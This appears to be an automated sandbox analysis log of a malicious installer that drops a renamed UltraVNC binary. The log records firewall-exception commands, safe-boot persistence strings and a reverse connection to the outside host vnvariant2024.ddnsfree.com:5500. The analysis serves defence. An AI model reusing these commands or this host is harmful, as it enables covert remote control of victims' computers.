Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile written: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.iniJump to behavior
Source: C:\Games\taskhost.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Preventivo24.01.11.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Preventivo24.01.11.exeStatic file information: File size 5955744 > 1048576
Source: Preventivo24.01.11.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x295c00
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Preventivo24.01.11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Preventivo24.01.11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: shi6E82.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00FC0CA0 LoadLibraryW,GetProcAddress,FreeLibrary,
Source: Preventivo24.01.11.exeStatic PE information: section name: .didat
Source: ddengine.dll.0.drStatic PE information: section name: .SharedD
Source: shi6E82.tmp.0.drStatic PE information: section name: .wpp_sf
Source: shi6E82.tmp.0.drStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009F6820 pushfd ; iretd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009F6064 push esp; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A8900 push ebp; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009AA5B8 push eax; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009A8DA4 push ecx; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_00968443 push ds; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_00963A48 push ecx; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009683CF push ds; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_3_009705F3 push 00000078h; retf
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00F9A4B0 push ecx; mov dword ptr [esp], 3F800000h
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_0108B2DE push ecx; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9D5CA push esi; ret
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeCode function: 0_2_00E9FB10 push ecx; mov dword ptr [esp], ecx
Source: C:\Games\viewer.exeCode function: 6_2_006350CC push ecx; ret
Source: C:\Games\viewer.exeCode function: 6_2_00635676 push ecx; ret
Source: C:\Games\taskhost.exeCode function: 41_2_001E6143 push ecx; ret
Source: C:\Games\taskhost.exeCode function: 41_2_000A51FF pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE25B pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE263 pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000A5265 push 60F5C5F1h; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE27D pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE275 pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AC5A6 pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE5FB pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE603 pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE61D pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000AE615 pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000ADEBB pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000ADEC3 pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000ADEDD pushad ; iretd
Source: C:\Games\taskhost.exeCode function: 41_2_000ADED5 pushad ; iretd

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6FDC.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exeJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exeJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6FFC.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\shi6E82.tmpJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dllJump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeFile created: C:\Users\user\AppData\Local\Temp\MSI6F00.tmpJump to dropped file
Source: taskhost.exe.0.drBinary or memory string: bcdedit.exe
Source: taskhost.exe.0.drBinary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: C:\Games\taskhost.exeCode function: 41_2_000CAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,
Source: C:\Games\taskhost.exeCode function: 41_2_000C7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,
Source: C:\Games\taskhost.exeCode function: 41_2_000D37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC,
Source: C:\Games\viewer.exeCode function: 6_2_00633D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Games\viewer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
